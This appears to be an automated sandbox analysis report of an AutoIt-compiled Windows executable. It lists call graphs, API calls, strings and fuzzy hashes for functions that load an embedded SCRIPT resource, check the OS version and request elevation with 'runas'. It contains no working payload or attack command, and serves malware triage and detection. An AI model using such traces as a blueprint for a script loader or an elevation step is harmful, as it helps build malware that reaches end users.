98561->98559 98562 f2dbaf Sleep 98584 f2dbc0 98562->98584 98563 f72b74 Sleep 98563->98584 98564 f3e551 timeGetTime 98564->98584 98565 f71dda timeGetTime 98617 f3e300 23 API calls 98565->98617 98568 f72c0b GetExitCodeProcess 98570 f72c37 CloseHandle 98568->98570 98571 f72c21 WaitForSingleObject 98568->98571 98569->98555 98569->98556 98569->98557 98569->98559 98569->98560 98569->98561 98569->98562 98569->98563 98569->98565 98573 f2d9d5 98569->98573 98581 f2ec40 235 API calls 98569->98581 98582 f31310 235 API calls 98569->98582 98583 f2bf40 235 API calls 98569->98583 98586 f2dd50 98569->98586 98593 f2dfd0 98569->98593 98616 f3edf6 IsDialogMessageW GetClassLongW 98569->98616 98618 f93a2a 23 API calls 98569->98618 98619 f9359c 82 API calls __wsopen_s 98569->98619 98570->98584 98571->98569 98571->98570 98572 f72a31 98572->98573 98574 fb29bf GetForegroundWindow 98574->98584 98576 f72ca9 Sleep 98576->98569 98581->98569 98582->98569 98583->98569 98584->98564 98584->98568 98584->98569 98584->98572 98584->98573 98584->98574 98584->98576 98620 fa5658 23 API calls 98584->98620 98621 f8e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98584->98621 98622 f8d4dc 47 API calls 98584->98622 98587 f2dd83 98586->98587 98588 f2dd6f 98586->98588 98624 f9359c 82 API calls __wsopen_s 98587->98624 98623 f2d260 235 API calls 2 library calls 98588->98623 98591 f2dd7a 98591->98569 98592 f72f75 98592->98592 98594 f2e010 98593->98594 98610 f2e0dc messages 98594->98610 98627 f40242 5 API calls __Init_thread_wait 98594->98627 98597 f72fca 98599 f2a961 22 API calls 98597->98599 98597->98610 98598 f2a961 22 API calls 98598->98610 98600 f72fe4 98599->98600 98628 f400a3 29 API calls __onexit 98600->98628 98604 f72fee 98629 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98604->98629 98607 f2ec40 235 API calls 98607->98610 98609 f2a8c7 22 API calls 98609->98610 98610->98598 98610->98607 98610->98609 98611 f2e3e1 98610->98611 98612 f304f0 22 API calls 98610->98612 98613 f9359c 82 API calls 98610->98613 98625 f2a81b 41 API calls 98610->98625 98626 f3a308 235 API calls 98610->98626 98630 f40242 5 API calls __Init_thread_wait 98610->98630 98631 f400a3 29 API calls __onexit 98610->98631 98632 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98610->98632 98633 fa47d4 235 API calls 98610->98633 98634 fa68c1 235 API calls 98610->98634 98611->98569 98612->98610 98613->98610 98616->98569 98617->98569 98618->98569 98619->98569 98620->98584 98621->98584 98622->98584 98623->98591 98624->98592 98625->98610 98626->98610 98627->98597 98628->98604 98629->98610 98630->98610 98631->98610 98632->98610 98633->98610 98634->98610 98635 f58402 98640 f581be 98635->98640 98638 f5842a 98645 f581ef try_get_first_available_module 98640->98645 98642 f583ee 98659 f527ec 26 API calls _abort 98642->98659 98644 f58343 98644->98638 98652 f60984 98644->98652 98651 f58338 98645->98651 98655 f48e0b 40 API calls 2 library calls 98645->98655 98647 f5838c 98647->98651 98656 f48e0b 40 API calls 2 library calls 98647->98656 98649 f583ab 98649->98651 98657 f48e0b 40 API calls 2 library calls 98649->98657 98651->98644 98658 f4f2d9 20 API calls _abort 98651->98658 98660 f60081 98652->98660 98654 f6099f 98654->98638 98655->98647 98656->98649 98657->98651 98658->98642 98659->98644 98662 f6008d ___scrt_is_nonwritable_in_current_image 98660->98662 98661 f6009b 98718 f4f2d9 20 API calls _abort 98661->98718 98662->98661 98664 f600d4 98662->98664 98671 f6065b 98664->98671 98665 f600a0 98719 f527ec 26 API calls _abort 98665->98719 98670 f600aa __fread_nolock 98670->98654 98721 f6042f 98671->98721 98674 f606a6 98739 f55221 98674->98739 98675 f6068d 98753 f4f2c6 20 API calls _abort 98675->98753 98678 f606ab 98680 f606b4 98678->98680 98681 f606cb 98678->98681 98679 f60692 98754 f4f2d9 20 API calls _abort 98679->98754 98755 f4f2c6 20 API calls _abort 98680->98755 98752 f6039a CreateFileW 98681->98752 98685 f606b9 98756 f4f2d9 20 API calls _abort 98685->98756 98686 f600f8 98720 f60121 LeaveCriticalSection __wsopen_s 98686->98720 98688 f60781 GetFileType 98689 f607d3 98688->98689 98690 f6078c GetLastError 98688->98690 98761 f5516a 21 API calls 3 library calls 98689->98761 98759 f4f2a3 20 API calls 2 library calls 98690->98759 98691 f60756 GetLastError 98758 f4f2a3 20 API calls 2 library calls 98691->98758 98694 f60704 98694->98688 98694->98691 98757 f6039a CreateFileW 98694->98757 98695 f6079a CloseHandle 98695->98679 98697 f607c3 98695->98697 98760 f4f2d9 20 API calls _abort 98697->98760 98699 f60749 98699->98688 98699->98691 98700 f607f4 98702 f60840 98700->98702 98762 f605ab 72 API calls 4 library calls 98700->98762 98707 f6086d 98702->98707 98763 f6014d 72 API calls 4 library calls 98702->98763 98703 f607c8 98703->98679 98706 f60866 98706->98707 98708 f6087e 98706->98708 98709 f586ae __wsopen_s 29 API calls 98707->98709 98708->98686 98710 f608fc CloseHandle 98708->98710 98709->98686 98764 f6039a CreateFileW 98710->98764 98712 f60927 98713 f6095d 98712->98713 98714 f60931 GetLastError 98712->98714 98713->98686 98765 f4f2a3 20 API calls 2 library calls 98714->98765 98716 f6093d 98766 f55333 21 API calls 3 library calls 98716->98766 98718->98665 98719->98670 98720->98670 98722 f60450 98721->98722 98727 f6046a 98721->98727 98722->98727 98774 f4f2d9 20 API calls _abort 98722->98774 98725 f6045f 98775 f527ec 26 API calls _abort 98725->98775 98767 f603bf 98727->98767 98728 f604a2 98729 f604d1 98728->98729 98776 f4f2d9 20 API calls _abort 98728->98776 98737 f60524 98729->98737 98778 f4d70d 26 API calls 2 library calls 98729->98778 98732 f6051f 98734 f6059e 98732->98734 98732->98737 98733 f604c6 98777 f527ec 26 API calls _abort 98733->98777 98779 f527fc 11 API calls _abort 98734->98779 98737->98674 98737->98675 98738 f605aa 98740 f5522d ___scrt_is_nonwritable_in_current_image 98739->98740 98782 f52f5e EnterCriticalSection 98740->98782 98742 f5527b 98783 f5532a 98742->98783 98743 f55234 98743->98742 98744 f55259 98743->98744 98749 f552c7 EnterCriticalSection 98743->98749 98747 f55000 __wsopen_s 21 API calls 98744->98747 98746 f552a4 __fread_nolock 98746->98678 98748 f5525e 98747->98748 98748->98742 98786 f55147 EnterCriticalSection 98748->98786 98749->98742 98750 f552d4 LeaveCriticalSection 98749->98750 98750->98743 98752->98694 98753->98679 98754->98686 98755->98685 98756->98679 98757->98699 98758->98679 98759->98695 98760->98703 98761->98700 98762->98702 98763->98706 98764->98712 98765->98716 98766->98713 98769 f603d7 98767->98769 98768 f603f2 98768->98728 98769->98768 98780 f4f2d9 20 API calls _abort 98769->98780 98771 f60416 98781 f527ec 26 API calls _abort 98771->98781 98773 f60421 98773->98728 98774->98725 98775->98727 98776->98733 98777->98729 98778->98732 98779->98738 98780->98771 98781->98773 98782->98743 98787 f52fa6 LeaveCriticalSection 98783->98787 98785 f55331 98785->98746 98786->98742 98787->98785 98788 f21cad SystemParametersInfoW

                                                      Executed Functions

                                                      Function 00F242DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 234 f242de-f2434d call f2a961 GetVersionExW call f26b57 239 f63617-f6362a 234->239 240 f24353 234->240 242 f6362b-f6362f 239->242 241 f24355-f24357 240->241 243 f63656 241->243 244 f2435d-f243bc call f293b2 call f237a0 241->244 245 f63632-f6363e 242->245 246 f63631 242->246 250 f6365d-f63660 243->250 263 f243c2-f243c4 244->263 264 f637df-f637e6 244->264 245->242 247 f63640-f63642 245->247 246->245 247->241 249 f63648-f6364f 247->249 249->239 252 f63651 249->252 253 f63666-f636a8 250->253 254 f2441b-f24435 GetCurrentProcess IsWow64Process 250->254 252->243 253->254 258 f636ae-f636b1 253->258 256 f24437 254->256 257 f24494-f2449a 254->257 260 f2443d-f24449 256->260 257->260 261 f636b3-f636bd 258->261 262 f636db-f636e5 258->262 265 f63824-f63828 GetSystemInfo 260->265 266 f2444f-f2445e LoadLibraryA 260->266 267 f636bf-f636c5 261->267 268 f636ca-f636d6 261->268 270 f636e7-f636f3 262->270 271 f636f8-f63702 262->271 263->250 269 f243ca-f243dd 263->269 272 f63806-f63809 264->272 273 f637e8 264->273 278 f24460-f2446e GetProcAddress 266->278 279 f2449c-f244a6 GetSystemInfo 266->279 267->254 268->254 280 f63726-f6372f 269->280 281 f243e3-f243e5 269->281 270->254 274 f63704-f63710 271->274 275 f63715-f63721 271->275 276 f637f4-f637fc 272->276 277 f6380b-f6381a 272->277 282 f637ee 273->282 274->254 275->254 276->272 277->282 285 f6381c-f63822 277->285 278->279 286 f24470-f24474 GetNativeSystemInfo 278->286 287 f24476-f24478 279->287 283 f63731-f63737 280->283 284 f6373c-f63748 280->284 288 f243eb-f243ee 281->288 289 f6374d-f63762 281->289 282->276 283->254 284->254 285->276 286->287 294 f24481-f24493 287->294 295 f2447a-f2447b FreeLibrary 287->295 290 f243f4-f2440f 288->290 291 f63791-f63794 288->291 292 f63764-f6376a 289->292 293 f6376f-f6377b 289->293 296 f63780-f6378c 290->296 297 f24415 290->297 291->254 298 f6379a-f637c1 291->298 292->254 293->254 295->294 296->254 297->254 299 f637c3-f637c9 298->299 300 f637ce-f637da 298->300 299->254 300->254
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00F2430D
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • GetCurrentProcess.KERNEL32(?,00FBCB64,00000000,?,?), ref: 00F24422
                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F24429
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F24454
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F24466
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00F24474
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F2447B
                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00F244A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                      • API String ID: 3290436268-3101561225
                                                      • Opcode ID: 09683c9dbfb9c0d1fed9c9c3686c6d3cb37a4806824104871cb1cce22acfc6b5
                                                      • Instruction ID: 94e2f75e5102dff3c77dfd1ebd02717761bea9d61ccd7546a02ddd6dce58d13c
                                                      • Opcode Fuzzy Hash: 09683c9dbfb9c0d1fed9c9c3686c6d3cb37a4806824104871cb1cce22acfc6b5
                                                      • Instruction Fuzzy Hash: A0A1B266D0E2DCDFC711D7ADBC816B57FEC7F26310B0849A9D48193A22D2615908FF61
                                                      Function 00F242A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 661 f242a2-f242ba CreateStreamOnHGlobal 662 f242da-f242dd 661->662 663 f242bc-f242d3 FindResourceExW 661->663 664 f242d9 663->664 665 f635ba-f635c9 LoadResource 663->665 664->662 665->664 666 f635cf-f635dd SizeofResource 665->666 666->664 667 f635e3-f635ee LockResource 666->667 667->664 668 f635f4-f63612 667->668 668->664
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F250AA,?,?,00000000,00000000), ref: 00F242B2
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F250AA,?,?,00000000,00000000), ref: 00F242C9
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00F250AA,?,?,00000000,00000000,?,?,?,?,?,?,00F24F20), ref: 00F635BE
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00F250AA,?,?,00000000,00000000,?,?,?,?,?,?,00F24F20), ref: 00F635D3
                                                      • LockResource.KERNEL32(00F250AA,?,?,00F250AA,?,?,00000000,00000000,?,?,?,?,?,?,00F24F20,?), ref: 00F635E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 28b46215802320524dc007a801a36cd5889cf4758e8e837ebdb855a9fb28579c
                                                      • Instruction ID: d89da2396fcae7abe1a8d0ee1aa53e150f9fbaf27b33ec0371400cbe73a85aa5
                                                      • Opcode Fuzzy Hash: 28b46215802320524dc007a801a36cd5889cf4758e8e837ebdb855a9fb28579c
                                                      • Instruction Fuzzy Hash: CA118271600705FFD7218BA6EC88F677BB9EBC5B51F144269F402D6290DBB1EC00AA70
                                                      Function 00F62BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F22B6B
                                                        • Part of subcall function 00F23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FF1418,?,00F22E7F,?,?,?,00000000), ref: 00F23A78
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00FE2224), ref: 00F62C10
                                                      • ShellExecuteW.SHELL32(00000000,?,?,00FE2224), ref: 00F62C17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                      • String ID: runas
                                                      • API String ID: 448630720-4000483414
                                                      • Opcode ID: a2a8a135fd2850dae299662dc5f0e8e59b998bbaa32324c05fe6277f79eee9f8
                                                      • Instruction ID: a8a5aad38052d65538a696b1c5c087d8f12ccdc7aab662c061082dff8a194dc0
                                                      • Opcode Fuzzy Hash: a2a8a135fd2850dae299662dc5f0e8e59b998bbaa32324c05fe6277f79eee9f8
                                                      • Instruction Fuzzy Hash: C311AF71608269AAC714FF60FC919BE77A8AFD5710F48082DB182570A3CF6D8A09F752
                                                      Function 00F8DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,00F65222), ref: 00F8DBCE
                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00F8DBDD
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00F8DBEE
                                                      • FindClose.KERNEL32(00000000), ref: 00F8DBFA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2695905019-0
                                                      • Opcode ID: 0e25fa3cf85dbdaa70ce0fe62b2808b57f963750289002094fdb2559cf06b09b
                                                      • Instruction ID: 9f8045122bc415a70d964da10c3a3531d68ed7662c46ef35f7ec77decb5b77aa
                                                      • Opcode Fuzzy Hash: 0e25fa3cf85dbdaa70ce0fe62b2808b57f963750289002094fdb2559cf06b09b
                                                      • Instruction Fuzzy Hash: 6BF0ED31810918678620BB7CAC4D8EB37AC9E02334B104702F836C20F0EBB09D94EBD6
                                                      Function 00F2D730 Relevance: 21.6, APIs: 14, Instructions: 624windowsleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetInputState.USER32 ref: 00F2D807
                                                      • timeGetTime.WINMM ref: 00F2DA07
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2DB28
                                                      • TranslateMessage.USER32(?), ref: 00F2DB7B
                                                      • DispatchMessageW.USER32(?), ref: 00F2DB89
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2DB9F
                                                      • Sleep.KERNEL32(0000000A), ref: 00F2DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                      • String ID:
                                                      • API String ID: 2189390790-0
                                                      • Opcode ID: 3b87d22a093ca5ce989a0461a248a2483c7ea9e363473f123ed5006abf56c0ed
                                                      • Instruction ID: 3a09e394a8219ab9db8b9bb174f0c7d8156db4c19a5847f6642232f8099cd998
                                                      • Opcode Fuzzy Hash: 3b87d22a093ca5ce989a0461a248a2483c7ea9e363473f123ed5006abf56c0ed
                                                      • Instruction Fuzzy Hash: 60421431A08255DFD728CF24D894BAAB7E4BF85320F14861EF49987291D774E884FF82
                                                      Function 00F22CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F22D07
                                                      • RegisterClassExW.USER32(00000030), ref: 00F22D31
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F22D42
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00F22D5F
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F22D6F
                                                      • LoadIconW.USER32(000000A9), ref: 00F22D85
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F22D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 7a3e53c6142633cdbc7cccf79403c0e666485781b0bac35332aae8fff7d82e50
                                                      • Instruction ID: 84e2b3c1808d9a311b2c101c6f40222297cf3e4b48ca19732d0573ed3183565f
                                                      • Opcode Fuzzy Hash: 7a3e53c6142633cdbc7cccf79403c0e666485781b0bac35332aae8fff7d82e50
                                                      • Instruction Fuzzy Hash: 1B21C3B591121CEFDB10DFA4E889BEEBBB8FB08700F10421AF551A62A0D7B54544EF91
                                                      Function 00F6065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 302 f6065b-f6068b call f6042f 305 f606a6-f606b2 call f55221 302->305 306 f6068d-f60698 call f4f2c6 302->306 311 f606b4-f606c9 call f4f2c6 call f4f2d9 305->311 312 f606cb-f60714 call f6039a 305->312 313 f6069a-f606a1 call f4f2d9 306->313 311->313 322 f60716-f6071f 312->322 323 f60781-f6078a GetFileType 312->323 320 f6097d-f60983 313->320 327 f60756-f6077c GetLastError call f4f2a3 322->327 328 f60721-f60725 322->328 324 f607d3-f607d6 323->324 325 f6078c-f607bd GetLastError call f4f2a3 CloseHandle 323->325 331 f607df-f607e5 324->331 332 f607d8-f607dd 324->332 325->313 339 f607c3-f607ce call f4f2d9 325->339 327->313 328->327 333 f60727-f60754 call f6039a 328->333 336 f607e9-f60837 call f5516a 331->336 337 f607e7 331->337 332->336 333->323 333->327 344 f60847-f6086b call f6014d 336->344 345 f60839-f60845 call f605ab 336->345 337->336 339->313 352 f6087e-f608c1 344->352 353 f6086d 344->353 345->344 351 f6086f-f60879 call f586ae 345->351 351->320 355 f608e2-f608f0 352->355 356 f608c3-f608c7 352->356 353->351 359 f608f6-f608fa 355->359 360 f6097b 355->360 356->355 358 f608c9-f608dd 356->358 358->355 359->360 361 f608fc-f6092f CloseHandle call f6039a 359->361 360->320 364 f60963-f60977 361->364 365 f60931-f6095d GetLastError call f4f2a3 call f55333 361->365 364->360 365->364
                                                      APIs
                                                        • Part of subcall function 00F6039A: CreateFileW.KERNELBASE(00000000,00000000,?,00F60704,?,?,00000000,?,00F60704,00000000,0000000C), ref: 00F603B7
                                                      • GetLastError.KERNEL32 ref: 00F6076F
                                                      • __dosmaperr.LIBCMT ref: 00F60776
                                                      • GetFileType.KERNELBASE(00000000), ref: 00F60782
                                                      • GetLastError.KERNEL32 ref: 00F6078C
                                                      • __dosmaperr.LIBCMT ref: 00F60795
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F607B5
                                                      • CloseHandle.KERNEL32(?), ref: 00F608FF
                                                      • GetLastError.KERNEL32 ref: 00F60931
                                                      • __dosmaperr.LIBCMT ref: 00F60938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 818ac49e44ae5b4a05ec733b5505c6a31da57dfd537e9900caa264844cb89747
                                                      • Instruction ID: 84efb5c0743232c984c8a74a28a2dc470ec1afc2933b49864ebd8778c30e28db
                                                      • Opcode Fuzzy Hash: 818ac49e44ae5b4a05ec733b5505c6a31da57dfd537e9900caa264844cb89747
                                                      • Instruction Fuzzy Hash: 28A12432E141088FDF19EF68DC91BAE3BA0EB46320F240159F8159B3D2DB359D16EB91
                                                      Function 00F2344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00F23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FF1418,?,00F22E7F,?,?,?,00000000), ref: 00F23A78
                                                        • Part of subcall function 00F23357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F23379
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F2356A
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F6318D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F631CE
                                                      • RegCloseKey.ADVAPI32(?), ref: 00F63210
                                                      • _wcslen.LIBCMT ref: 00F63277
                                                      • _wcslen.LIBCMT ref: 00F63286
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 98802146-2727554177
                                                      • Opcode ID: 4cc0be0ef11434f1921856e354a0a0404d1ffce94e8f85aee06a8d4edbd747d9
                                                      • Instruction ID: c7e0bd7390dbdb90d4ebf826a9fa0ff96f6e0c92804910ab553104aaf8c16ca8
                                                      • Opcode Fuzzy Hash: 4cc0be0ef11434f1921856e354a0a0404d1ffce94e8f85aee06a8d4edbd747d9
                                                      • Instruction Fuzzy Hash: B671A2B18053199FC314EF69EC819ABBBECFF85750F40042DF54583161EB789A48EB52
                                                      Function 00F22B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F22B8E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00F22B9D
                                                      • LoadIconW.USER32(00000063), ref: 00F22BB3
